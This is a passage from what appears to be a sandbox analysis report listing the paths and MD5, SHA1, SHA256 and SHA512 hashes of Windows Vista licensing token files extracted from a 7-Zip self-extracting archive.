SHA512 940bd81773efa49da9320ff7cc9a74e25076bf5f52c22ff9c9ccd7bb0442fc4ea52bdd0be5fad7c35aec823394b41356d08f6659f36594a44222bc70eb64278d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\volmgrx-ppdlic.xrm-ms

MD5 730d31131dd455ff8baef77a0a93797d
SHA1 d1b9a4d670446d7e18bdd119d299a36d5d389396
SHA256 45624e0344153ec78f982ff0b53f5a7b2af92f309cea54ec874ccabf6bc4fbcd
SHA512 c20eee34e9bd869bacfe1cbd36c135c014770cbc01e4dd655c41aa1fb1a1f73742243222ddc1dec9595f42dc6339bff6527288ed66aa3ede3b51178e22ca57ea

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\volmgrx-ppdlic.xrm-ms

MD5 de34d3089970cb4f7cb6dc0984c9ef18
SHA1 313d10512563098c611cd34ef6538e345ecc0d8e
SHA256 46421b737215b942acb215c2f0490e2e1c26dc94556249f01777611894e795c7
SHA512 78fab67c7f8f32437a4fa8739a05a7cd6f854e3cc3e960ea06f808a908af753baf4fb7cb6e4b7d3ef1b8b4bb478e588ea88f682d1e2ebf3dc2d5e22c4f252b80

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\VirtualXP-licensing-ppdlic.xrm-ms

MD5 dfc4b7581d4df4d903c54ce7c74b784c
SHA1 276c3126131f65d8ac8a103e3eef2a12da7246b4
SHA256 2923cd708713ac2d3b098e25fa9e8f7be5d1e8f826970a92b52faf314daae81e
SHA512 fb23e45faed1d5b8573f40f114221951dfe322f1a9d50fdc43030573621232956afbab1cb5c2209114ee3f430dc654ee79a92cffeaf49996e96992d63dda9755

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\VirtualPC-licensing-ppdlic.xrm-ms

MD5 9018beb2601a16dc8631b11e69063cdf
SHA1 8f658b2220ed0dfe2b42a1eacf093e59efa9f61e
SHA256 6f50a8bf5d7bafa50f549a43e20f2399192200e8ca9a18e463655ae2c8700c8d
SHA512 3e985cb799db557c3535a61a5578cf00487253b8b81c8f7abd246af139273aa07ec5467da04a491a53476cd398e69a03e93004d001f40223e396715a39e9abab

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TerminalServices-RemoteConnectionManager-UiEffects-ppdlic.xrm-ms

MD5 554e4edfb12c4760e1305c451c88d07e
SHA1 506ac0e3ae7de3932bb8d32976f18d2d23d51e03
SHA256 6ab66b179948484415e11abc06bb71fe2a5d79a64f1b07693d17281614d352e7
SHA512 2ab9b8078b250fe9f9ae2db2f7b817a48303dd2332958ef7879aee03cd60884800be98200e21ff276d94f399ff02695ab60a783b707d1a7ec46a7e392a726064

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TerminalServices-RemoteConnectionManager-UiEffects-ppdlic.xrm-ms

MD5 13ac4873830b38c9b9fc65a3cc4155c2
SHA1 71c51b61e1dbef602e526e8b3c0050e344b220c3
SHA256 aa02430cdb25065564532a97b9979dc7189e747f3d09031326526184160785d4
SHA512 8dfe78981af396946a2218a7bd75f55b1383e62aeb55ded792400cce0c26afe4d0e3f2f50501353dec3f45a3f5efe9de3c9216ec8dbfe794f8f2b5400bf4663b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-RemoteConnectionManager-UiEffects-ppdlic.xrm-ms

MD5 72830612581636025945e1c460b1386b
SHA1 b0f6e67de9ca0062c14d372a883c5949ac673045
SHA256 f6dd46ea39a61bcb8259be6edeab5dc269c314e903ce95c91f0015f631b747e0
SHA512 e5f3a2c068adf49aa34c923a51567007b1e933e3174db1f5a828d6a6209df715c9fbd5bcaeef6c261fe5cf4307665a7d45249281f8ceb39411d2e93bb4cb5c5b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TerminalServices-RemoteConnectionManager-License-ppdlic.xrm-ms

MD5 b35a8385d0c28beadf4837e3f7d668a8
SHA1 ce2d7f9994b5f80d57a63c44d04f4d2cf61bcf21
SHA256 20f7421a9c164087b9455d0e33c19e9baedae6d2e8b8c608579fec645c2cf1f7
SHA512 494a326b2a9a9ac8d68154ebcf072137fc9fdc292748d19945c6ddba4998dec0a565b0a21d8a74752087259ba16b0b638f8caaae2cad1a44a8d8b21703b6c236

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TerminalServices-RemoteConnectionManager-License-ppdlic.xrm-ms

MD5 1348977aa0487a60d989112b89ed4926
SHA1 500739204eadd01ff053019460403f49c237e8de
SHA256 be04eeb429b856f1b08de942c3bc8eac8158ceb308622ef6207f36634b99935f
SHA512 d4c52af07617b36bf208ae5004433b263fc105f0fa3aeaf7329cb7b0371d3131284e8b89349b9d62016e4d2e5a61615f7e5325047850bd653d5b6dd5431189bc

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-RemoteConnectionManager-License-ppdlic.xrm-ms

MD5 d40c66c818895f073a3e617f3a466c00
SHA1 ad2f5da5155e8554378f05b307525de92e6c01dd
SHA256 a75faf733fb9dc1ae611cc8dcb951d849c2fb4bfca175740268e9cb2f9fdb891
SHA512 7820f84d369a2e7ebcd32457ef53ea751524b9f9af97f1992d97ca45e4a4a2229c3ad04faf64de6dc424b1a75002be3dcd40246e733ed9b137c4928b6be1822d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\TerminalServices-RemoteApplications-ClientSku-ppdlic.xrm-ms

MD5 64c9ef528365fa88c242788284cdee52
SHA1 d9ef36821b43259c70c9c073b686b359834316a7
SHA256 58347e70e3db56274e60c30f85b4eb6f07b12e6febfa11a0e253a23991399845
SHA512 1be35ac973d0f9c08b1fe6935a86e16fb4bdfe29086381c89b58bd6cff99ca1138edfffa0569e185c3d5a2901d4a6f4bf111ec40f79201634831c5098f01b4a4

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\TerminalServices-DeviceRedirection-Licenses-ppdlic.xrm-ms

MD5 4de3c2190b1dac1486949271fd6a280c
SHA1 aafed3bc8d8aac53a32ebcc09889cc49b8452963
SHA256 c425d093109c62de70a2451b11e51c5e2b9773ce7145584c3a65fd277ac32952
SHA512 81fb783ae4748dc94e0380d1832fd369872da5c7e09beb14ca9d1fcd361e7b5c0fe92e3935bae7560cf62db2dfc37633658bd19aea1082fd362b1a362488ee22

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-DeviceRedirection-Licenses-ppdlic.xrm-ms

MD5 c446b03359b9d7c16545fd35c40d6e1f
SHA1 da4efb3594ec69bec631258785939668271519fa
SHA256 acc5c5b9d1845aa070d2aa2b2c36a7b50c7d3ff7d7f67dcf4469f26f3f50eeed
SHA512 65f62bc8ad8351db02f896177fd7a36d949dc26d05d7e8d747f9f893e760d1918d8673a6f31eae5d8232ef69476a739ab34ac769f17df5cd502b0e7c80925925

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms

MD5 54041a042559f0a5278d47bca29bb0c5
SHA1 2ea883d09377e43f92de80412340d6b64b1fb768
SHA256 ecf0b2cec5bef25e335d6374e18018731e6cc7f40ccac088f2d61f242fe12671
SHA512 e308ac489f5cd43b3bffce776183f9d47fb2d503989ca42e4fc13e6bf87ad27f31cc082c226c16d220007f5d0df375a9fff7df9ecf47577103f467338eb40feb

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms

MD5 9004333844f593b83320e0f80a676f7f
SHA1 4371b63ff04f0d15775d0ac4b3e85ac13a570df7
SHA256 cdc92b8f0b79343de11e1e8f92ea6f8a7888226c7745111c08821e87c09a1679
SHA512 9daeae211b4b8a6dddeb8601a85385727430cc703c84fbb17ccf6f631b084897e7d68e9aab047178664e8b8d42bf7ad5c00caf7eb98640f3501baecc4b53d5ff

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms

MD5 186016555b75261bcd0f9f14711417c3
SHA1 cbae3243fe292e9c4787c26ea62c904260276430
SHA256 3ce0917467b3efd51e1877e2837df2341b95d25d271217fac16d0a2d743be5db
SHA512 d468bf659715ddba92fa4b85566013b827ae95144f1d23b05936ab037d31634e2bffdd1dd7fd19215a7af412ced4eead9a29aadcf6096c62b0470ec8ce3dac22

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCInputPersonalization-ppdlic.xrm-ms

MD5 3664c73e277dd5ca2f8ecfa5dd0f530e
SHA1 effca8435427555f4bf48d15eb5af9f4d5bb0922
SHA256 cff3bad326a43041f8a96aac91fcbf1847336693a6190df5ce681c957e5a4564
SHA512 20a9212194d7eaf2f73abcf030bb493da4f908b1866f9851d319ff5cdd5f9c20a71c52669a91f1d6f8cd6582af7fe750ebfe5edbf66f4336e638e03fe41a92b3

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCInputPersonalization-ppdlic.xrm-ms

MD5 eda1a44cbfd4823ff729c0c2980f4b19
SHA1 d942ca57433e7b5a9b4897f3dae6e79c62a0bab6
SHA256 19f7c0e437f0e1aac79545259992900afb4e39bcfb4f0b2c262d106566e64503
SHA512 e435edac80df8089eba758ad81ef1238dcdfde3a4cf2556abb73cc588a2e4ef05c3452dd90a01f108ea92977a7ecffa907d9f9b1a5938b044a79c6f93a9e4c6a

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCInputPanel-ppdlic.xrm-ms

MD5 64835c36eeb2331b56bfac153f5f6df7
SHA1 024f0d3e93d0563420e7364021606f18691216fd
SHA256 ee19f5dcdd812df8138b6de03a45a37cdc9f39a86f245338b0060c1964d18e14
SHA512 e63cef4c52a9bf8d5ed21b2ca5aeed31a50d9b1d7ef61fdae6bad994ff562ff73966385dee82233271232b5434e12f724135f8f3d21db2734587cb26e92ca1d0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCInputPanel-ppdlic.xrm-ms

MD5 76df706a75912ad4a0848db1fe7dc828
SHA1 d0a7a17b0f5b23082b112d24dcf2940240f3a9fa
SHA256 33dd1f53221d3513bf5b29b8a5903ee4250032c5439e3358cd47bf905d2648a9
SHA512 24107d1b3d637a3f8b06d2946d9eedc2e568ae69225661a0ba3f7b3caef134aff33fcd76d0a7f551b7e45668e3b59d9c3c305bbc3bccb5e873425b647d1be861

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCCoreInkRecognitionLicensing-ppdlic.xrm-ms

MD5 2f1a66e0ed3b59db9922e65d8bcb211e
SHA1 df70d39269b1ef4fad2e743455325782d2bca41e
SHA256 f8487b9b24b961f526cc12384cea446675f234cba34db13d9146ea7c4352f82f
SHA512 2f12e23acd9220d9270b31399a1fc7aa3c79a0bf4b8d5f2d1c4cc3b0a3cf4fb8c83bfc174d4f69fbbba994a7a0efa70b848a74d6168f1c591dd48245b78290f6

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCCoreInkRecognition-ppdlic.xrm-ms

MD5 149d1b24df36956cb0331f7f8cee54ad
SHA1 479ada396bfd24c83e79d4e76e894f72c17d6a7e
SHA256 5d21f98296b4527df4b1c0d19b61f060f51dcfce41c12d59d8473e6b7db214d0
SHA512 b401898e6b55236de11c8233e3fb576495f30220e49f8ec5aa42fb2d95e37aaea2b2eddbecf88f4755a3ed459fd389040cb245341564ec8de01557fd126604cf

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCAccessories-ppdlic.xrm-ms

MD5 7272640063120b9d540554478464b65c
SHA1 d1ec1f1a1a2e81a365e75c1110bca8a1fbccfe92
SHA256 9c269dc23fc9db6553a4b1fa043194d1392a1c29fc5a46635013140645af9360
SHA512 ab1e447c9cf4acc07134ffeb7e992443c1ef375dcd9d1d7b908278f02c0cef8d42038ff9f08874c52ca6aa75dded4c2b9384e8d12ca942a726f2c2425be4b5f9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCAccessories-ppdlic.xrm-ms

MD5 cb31813f2805d3698ca7bd55d99092d4
SHA1 85947a0e3b794dc16984b883f3b3993eaed7dfad
SHA256 a40725024e549d1979e18510190f9d02ec088ab7ed3178e2db4069b901042e34
SHA512 8d099432245ed722707c503084b1d1a629e8c1f3b69d2ffee7dc6d3c2fd798429463f1423dd50a3f6088dbaebbc0ca7b37196ad356faaadb3288f5ee1d3f9154

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms

MD5 20a5db3003e1ca92bbba0cde89aaf9c8
SHA1 2d3540d1551da7f6f34b67cb8b2c231ae3072f66
SHA256 16c941b897beac91a95a5f87246006a0528a48edcb38bdf95ae45a5d69d68d2c
SHA512 f47020bc2ed4cd08818b0dc566a54f2230dd6edfc5c0584a1190e42ac2ee0e6dd7b6d8a4648183430d6d534870334e1235183637254199e19ee7deb93b8b9ae2

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms

MD5 779efd3c91df0caac2e76e5055830364
SHA1 115bf50e6138827f062dd470453b4027d65c6005
SHA256 d8534a7ab6ef3a79f8b47f85ef13b04888ea49b224006c9908ddcc1a442c4406
SHA512 fe643ff15bd67b8f285fd402ddd5ddc311427ac49aaf9fd7b923916e40cada8154bb20c483d20b8c0d8934164845ec94bc30d53d6d210d756fcf5c5df7ed7ab1

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms

MD5 4d57c5079a9fcdfddb150aefb3284851
SHA1 687d4ad9fd88c4ff66d61a455ccb6de81ef628ae
SHA256 748f8e14e24feb16bed27a345dcb1ecb2a01bc799a34124152aa7a6cc878d9cb
SHA512 defcaf79317a1bf2af1d19ecc876c782bcfe78b2ed0b59be1d6b80bf290f07b0e75c3be9ca3964273b1675e89ae118e20fa26b7a5d5ae33c9321550630b51d68

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms

MD5 1f810139b734d9eeeeaf38830098001d
SHA1 ce81976eab6a5ca23cf0fe2dc9698a7de71100c4
SHA256 e0fe3041abc7f72a6ec701bc37b1fb01bc8ada1cf63f6da083a143a5e1fece11
SHA512 589fc1b7c7d20cc4db6ec37a5bf57dd822a282b889bb755393c334a300272650dc11d6b57086a7ae3409f42cdc85e339a0c133a8da13dfc263821cb39571a385

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms

MD5 2083be4155fdb7c47cad2070f142539e
SHA1 487b82c0cad62039834c19bae4a38dfa3b82a4f6
SHA256 4733d97b22c247300cc0ed618a259827dc48401792fb8daa8244496ff04ab19e
SHA512 39ae6dd9150bf1a6eafd607f0706273aa1621111a11fc9119b995adc42e43ff8b1379dae056f169c8a5f6cdbfd1108ed3889f7eb467afdcb5e60e54fcd0dfac0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms

MD5 81bbf79232267782b6ca6583edc741bc
SHA1 d386feaaaf5c97c2e948f922dea7a0ac00629142
SHA256 ad68ac46027d6ab2957039363a9bdaff39007291af02281c06171835016ee40c
SHA512 b176fcbfe64e8950ad323bd1e3132b34477ab8b6ba49f6af6858d3d63ea979a0c60d3748ceff759f0d34e19bb804a7ae022cee08f331f092c10e0832ee061227

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPC-MathInputLicensing-ppdlic.xrm-ms

MD5 1d02749f5f142a9a00496a7c3dda3231
SHA1 16921994e010243669144cc2938d27d3b707d20b
SHA256 6b0e449d76fde8b8e67510436a794885c8fcf8bae43b57aee2cb612662226f17
SHA512 029b9125173a9d00afe421b7a365f0de5c7b7f581144366a3fb6b1295d8888f3cb35b8ce843f21a4638a99250c4ff1f2e140968d33c755029591928b5019c8dd

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\StickyNotesLicensing-ppdlic.xrm-ms

MD5 d975886ec992bbb6b985f4d5f54a5d8d
SHA1 e99984b91934f95590e15e9a0ca9f4d2f54f7247
SHA256 078e6f340c99aa738cc0d30a4eef148e83b4ff6aa6877b6dcbd78ca6a4352f29
SHA512 cf9283a47714f1ce527266b040a9278cb7c733da102a52d4a4b6c242968d93da803aa795ea8d741d95fa8e8678d5acbc65f3bc83495eabe7bbb081f8b36c7f34

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\SnippingToolLicensing-ppdlic.xrm-ms

MD5 86e2fb2c0a6236e2189733d2facb2a98
SHA1 1098eee45af4b12b5d35181b22f860c026a3440d
SHA256 af37a6a01bf769051e4ae9e888b903b2a55d5786511b42d6bfc61b1d04d25a84
SHA512 ac1f2c0a7de712d3b989d4fafd9fc2739550454b2f26b2298258a117a5916fe81dffb193899910a4b40dd6ea25d82647feba485dcc3c60dcdca26a4cfb38e34c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SMBServer-ppdlic.xrm-ms

MD5 8258842386390b3f224ffc5c95b158f4
SHA1 486248184a475a6a5da323b46d6f4680ea4ffae7
SHA256 da20ecbbed297dad750f83681e5684de7b263c62e2db19772725ac62c76c67ea
SHA512 1e1003c87686331ac48a970b974ced1a5a2ee070238739cd2fd6af142007bfb6610be961220e606c8d15f093129197b6d2b01a71b419653c16e9c8005ee71cae

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\SMBServer-ppdlic.xrm-ms

MD5 bafff5458c6cd314f0f808d3135c5df5
SHA1 5e0681cecff791bf3a76143405aa996b93473419
SHA256 e3358d23befe2c94518263c9e066298138964d6d45c83bb4befd1bc29009e504
SHA512 f6d480f9bdacfdfddc0ab697051c848f631ca96bd2b83bc20c60be022327946d0146eca8926052fd0b19692feca55c1acccdb99a94faa97f1c8c850a189a68bc

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\SMBServer-ppdlic.xrm-ms

MD5 7443ebab04bfac164d28e5a246849540
SHA1 5fd4a8ba3a20c5fd5d9769c3c1fcd7193b2b1999
SHA256 abcc57d5c4cb48f99bab71d9855f55b05503b3e4362983e7ff05b9bc366a2322
SHA512 f43a8f94bf99020dc0c32fc9e3852a8537d6597de46fb9490af5add4841efd044a88e36a3daae03b305e47b9caec9adcb1fa632f8c83f5a46e27cd09b9b62fdf

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 c74b672815841cb621c81bd6e907148d
SHA1 d511ad8f39e39ae31188b49a6096b238f9c706a3
SHA256 28353c379ff4368566bbe2f03c6f9a89dd4290b5018cb1e535f3aa9c18b971ed
SHA512 ac3ffd58922ee8aca46e17d74ce780a52f24ad9a2488ec4c6d59dd8b75f973927a7b1b89fac8ddab89b2f2914b8d8d8a0192bfc26f897faf2ef9ff0a799bafd0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 e18c40ca0cb2ec2e63950872f80d7907
SHA1 a287fdfbd54869fd23d46f5b07faabbdbc4a7f28
SHA256 b879a56786cfa555b679590f064e10c1903960fb51131ba6253b71415be79ca0
SHA512 dffc0d874b821a081a883f3ad4ce4760c4a1c277973ac68a4de3542da945442220632470d29d43b382b782297e5a0c4f56aa3cf2e8d635a770fcf7485c549f8f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 d76bcd367483566b424f4be810a4851d
SHA1 9157f7c85434cace18cab040d7566d42bd01c2f2
SHA256 533567ffc3d0c76bc5d3aa3228a36e868337c69e09256b61ccdaaebb7c7a8073
SHA512 de9117f1b89b77856fa35876824c28dc309e93bbb7ea8eeb35591c1a43b28008d2de802ffe1c840beefa5c97e5c64de5cc7355e929d3c4af294f71bf04a2ef80

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\shell32-license-ppdlic.xrm-ms

MD5 f8e68c039d4391b4ce8c7db9503a5d16
SHA1 46254944b2c36b155f902dbca9bc421c0c933f37
SHA256 2f0202de9a6c1dfd892fef87d3f1a9086e0dc0584166f886078e3b6c5471c48a
SHA512 79925026e0bcd89044ca3e8ca5c89427d244a3ae8f45de74e0f45a0f46f4c6e3322ab71a35b11aa31bc5936c41351834708b69d0360bdfae315aeb7c410a0a70

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\shell32-license-ppdlic.xrm-ms

MD5 53e9fda45791498334af0e10654fd9b9
SHA1 2ff31de31c075333204329849edb0743e7ade0a0
SHA256 de1a0a3c8daf7e7800e342f4e963857a2c1eadcc7130ba4c740731b3a30e1a19
SHA512 4396fba2987bdf5eb8eb3e53c3e3df8c8a0e795bbc1d98412d6157295f2afe18b74cda9c387c5f5fe9012fde14efe893b77d47bbef0b690bdf902beb2cd89b58

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\shell32-license-ppdlic.xrm-ms

MD5 f4ce1175aeab77a6ec1147603b2c6231
SHA1 a044f65d109805b784a8a48c3edbe8be19d70ea7
SHA256 9622176b54121191ad63a74484b64ad506860d7afd9781134dbc929ddc9f9de8
SHA512 04fd5aa4c9a6d82437a57a5f87576d55b8f79ac25a9dd2c7574d18ca6df07c4aa534294232d573cc5df87e9d172fd45d7f9d59d0f618576bfcff4efcac29d6b8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-PremiumInBoxGames-Chess-ppdlic.xrm-ms

MD5 610dce8131e5f167efe07952355a8afd
SHA1 29a3b676d81382dda7f2cb043ee4a2f3cbc0654c
SHA256 667c03bd0997ad5b51c4432ff077139f890bdb59c72572d53dd5736a29c6dd90
SHA512 6bd445fa724b0ab49afaa5422f7363a73756c7c1c4bffada3f36f1636246861cdf7b875c6b7471011c25f156b6de58177d46202caf9483827ff6fde9b55129e2

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-MultiplayerInboxGames-Spades-ppdlic.xrm-ms

MD5 79e9eeb881835d448a6ddce929ad4108
SHA1 2d873cd9ff409a0dfb345e001e6624e86203ec95
SHA256 b4f3a53c9d882ffad11e13f2f14d060500a6630a5fa70c41810025ffbde47d55
SHA512 1451a195bcb87caf306f88ae70d475c491567848150c341ea3c655ce0b6e982051f38df07a6a40e769da16fb747d32351bb0e13c22199d640d27af03a2fb2fd8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-MultiplayerInboxGames-Common-ppdlic.xrm-ms

MD5 7697679362e88ee6d230172ba820f673
SHA1 33b3c5383ea99561ac056f69085e00b520274a0c
SHA256 d7bc8a195e650b51b293df07e6ef3c53d97244195279f437bce3b01f5ffd87bd
SHA512 27d3854831496b1290cff89786bc1e163061c82d2f6b784525e8cf21942ce33e505bdc75eabf221cbb7049ff15d02ca572258e83b35bfecf03ac47eb43a8bbc7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-MultiplayerInboxGames-Checkers-ppdlic.xrm-ms

MD5 0e11804000bb4463ad0a073cb793c79e
SHA1 1341bb5ae535d2f532d490fe49fef6a1dc416e52
SHA256 2fb989ffa9b86431547444e6da5b2532d8e29dd40c2b352ff58dc889b3487301
SHA512 89b91f60fd3e79fbfa33f6d4e3ebab04f7074edcf2ff97b634b63c38f2dd6d37d84278bb4c9da084bcba900d6559fde63202546e6dec790786237d1e1dc23228

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-MultiplayerInboxGames-Backgammon-ppdlic.xrm-ms

MD5 a9390f550087d8b66369ddceb8b7935c
SHA1 64f3c4e0d662993718eac173de0c3495f42e2666
SHA256 5126a4ce725d6a80dabc9bc3c2fbe0318e10f99f6ff13374d46f8f0de77a315a
SHA512 34d2a787d3628badab474978cca3a1382818fbe2c731842c5342c68a66bce69a7bd94e0244dbcf8e45015a6e99b651cf2dffc7148a2c077870baec0b763921a9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-SpiderSolitaire-ppdlic.xrm-ms

MD5 10022005d581ca1e4fcca2040d28148e
SHA1 d607186a0cf5eeb3ff830d2e2e1f496c913691b7
SHA256 9643d60a8b0715fe0d287c7a1aab8d15509a025b94ee7dc56d48c5c8c4552df9
SHA512 d117f02c53fd2b2792989b5a2cd779264fbe6985cf328ec66d0b51cfbfad124243c5164346d853a14b650ed03328a7bba79270744c0998d851c6d5d2746b1d75

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-Solitaire-ppdlic.xrm-ms

MD5 ba449d6ad8326444846eed5bcfa21d1c
SHA1 5a4e18e3052f0bbe6bf11d19f7cc8d76a78d242f
SHA256 32c8f011cf5adb1ba9cca57ab57a70b405ce8653371a8f6df3d261420a38bb05
SHA512 104ad30f57ac83370b04d8968884a8511e509cbbac1c78b4efda59b4df6c4fc1b0f29e0af8144ab9ad9987cd497552ff13d1ff4d4fda8b7ba243bf93f5979dfa

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-Solitaire-ppdlic.xrm-ms

MD5 668aae567688e2e54fd437bd729bc738
SHA1 54b8e2b66ba2a24712f6539be801216c805af6a8
SHA256 b94b5b631272da59fc13f7965fca08a7e5d65ae73b8c4eb7392f2db7f09e154b
SHA512 13189dd13be64c2595d88f5bb5a7b4f1a8f83ea9cdae9b003c70223e3e2306e0a871c7639e65b71348eeb3740f5ba8754d6a5687f8a1f51a41369216572452a4

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-Solitaire-ppdlic.xrm-ms

MD5 f1ad6a6e72b968e8065d19a2014f8b0c
SHA1 0f4ea08826aca82040c3d73389e5b64c7f00be37
SHA256 b0bce05b1c5f9bf085cc31ab11132239914b9c5719cbbbff0286ae39b72b5e91
SHA512 cdd012eaefefebbfd716bfb8883896cee1a3fc3b7221a33d200912c5d19e69c030f9c3c564148e785db52ff5cf04c6b8697887323e0b5d998a856dd056685ac1

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-InBoxGames-Shanghai-ppdlic.xrm-ms

MD5 545415c594045882a797bb1026150d87
SHA1 6b3fa457f8189db3d11e14bed207962ff424c188
SHA256 4bebeb14192dcc04d97ea86ce8e31fc9366ed2180fa2cd79ccced1c8042f49eb
SHA512 190cdf7b810e076dbe24a6c4d0b07d63528fc925b619d97197a3d1f7496182c21ee00f28ca0c313d5edb47b10b5a6a9ef304249a97523f5233f8a6c613f399f8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-PurblePlace-ppdlic.xrm-ms

MD5 b91e43195bc615767ecedbdf85b54143
SHA1 16a584129d42b4d382f733597a16af3f1a244b00
SHA256 c01663b9e078e3c48601963c9b7d18f8ca64b52f1dde0475e52ef6451bc6653c
SHA512 ad7543ec01e16b4c8ab7d61aa3fcd835702494bef8159932389e4cc8ced346b745a0d7bf11a0f290417d5c07871e65de08e81dcdf30d15316a9dded5f5545650

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-PurblePlace-ppdlic.xrm-ms

